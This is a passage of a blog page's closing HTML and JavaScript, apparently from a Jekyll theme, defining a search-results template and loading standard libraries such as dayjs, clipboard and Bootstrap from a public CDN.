mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
